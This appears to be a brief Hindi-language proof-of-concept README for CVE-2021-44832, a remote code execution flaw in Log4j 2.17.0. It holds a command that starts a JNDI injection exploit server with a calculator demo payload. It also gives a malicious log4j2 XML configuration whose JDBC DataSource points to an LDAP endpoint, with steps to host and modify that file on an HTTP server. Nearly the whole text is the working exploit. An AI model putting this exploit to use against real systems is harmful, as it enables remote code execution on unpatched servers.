
Log4j 2.17.0 RCE (CVE-2021-44832) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो दुर्भावनापूर्ण कॉन्फ़िगरेशन फ़ाइल तैनाती के साथ JNDI इंजेक्शन का उपयोग करता है।
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"

<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="error">
<Appenders>
<JDBC name="databaseAppender" tableName="dbo.application_log">
<DataSource jndiName="ldap://127.0.0.1:1389/nvrcl6" />
<Column name="eventDate" isEventTimestamp="true" />
<Column name="level" pattern="%level" />
<Column name="logger" pattern="%logger" />
<Column name="message" pattern="%message" />
<Column name="exception" pattern="%ex{full}" />
</JDBC>
</Appenders>
<Loggers>
<Root level="warn">
<AppenderRef ref="databaseAppender"/>
</Root>
</Loggers>
</Configuration>
कॉन्फ़िगरेशन फ़ाइल को अपने http सर्वर पर तैनात करें
http सर्वर पर तैनात कॉन्फ़िगरेशन फ़ाइल में संशोधित करें

